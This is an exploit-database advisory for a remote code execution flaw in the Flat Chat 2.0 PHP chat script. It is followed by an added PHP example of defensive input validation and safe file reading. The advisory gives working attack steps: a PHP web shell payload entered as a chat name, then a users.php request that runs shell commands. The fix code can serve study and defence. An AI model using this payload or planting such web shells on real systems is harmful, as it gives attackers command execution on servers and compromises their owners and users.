Flat Chat 2.0 - 'include online.txt' Remote Code Execution

Author: Dj7xpl
type: webapps
platform: php
date_added: 2007-03-06 
verified: 1 
codes: OSVDB-33890;CVE-2007-1394 

                                           .-""""""""-.
                                          /   Dj7xpl   \
                                         |              |
                                         |,  .-.  .-.  ,|
                                         | )(_o/  \o_)( |
                                         |/     /\     \|
                               (@_       (_     ^^     _)
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          /
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Author   : Dj7xpl  | Dj7xpl@yahoo.com       |
+                               | Download : Http://www.undoweb.frih.net      |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit :
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-07]
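
Defensive counterpart to the advisory above, added here as an example and not taken from Flat Chat's source or from the advisory's author. It assumes, going by the advisory title, that chat names are stored in online.txt and that users.php pulls that file in with include. All function names and the name policy are hypothetical.

```php
<?php
// Added example, not Flat Chat code. ONLINE_FILE and all function names are assumptions.
const ONLINE_FILE = __DIR__ . '/online.txt';

// Accept only a short, allow-listed chat name; anything else is rejected outright.
function normalize_chat_name(string $raw): ?string
{
    $name = trim($raw);
    return preg_match('/^[A-Za-z0-9_ .-]{1,32}$/', $name) === 1 ? $name : null;
}

// Append one validated name per line under an exclusive lock.
function record_online_user(string $raw): bool
{
    $name = normalize_chat_name($raw);
    if ($name === null) {
        return false;
    }
    return file_put_contents(ONLINE_FILE, $name . "\n", FILE_APPEND | LOCK_EX) !== false;
}

// Read the user list as data. The weak pattern is `include 'online.txt';`,
// which hands user-written content to the PHP parser. file() never parses it,
// and htmlspecialchars() keeps stored markup from reaching the browser as HTML.
function render_online_users(): string
{
    $lines = is_file(ONLINE_FILE)
        ? file(ONLINE_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES)
        : [];
    $out = "<ul>\n";
    foreach ($lines ?: [] as $line) {
        $out .= '  <li>' . htmlspecialchars($line, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</li>\n";
    }
    return $out . "</ul>\n";
}

// Constructed sample input: one ordinary name and one name containing PHP tags.
if (PHP_SAPI === 'cli') {
    @unlink(ONLINE_FILE);
    var_dump(record_online_user('alice'));
    var_dump(record_online_user('<?php echo 1; ?>'));
    echo render_online_users();
}
```

Either control alone closes this path; keeping both means a name that slips past validation is still only ever displayed as text.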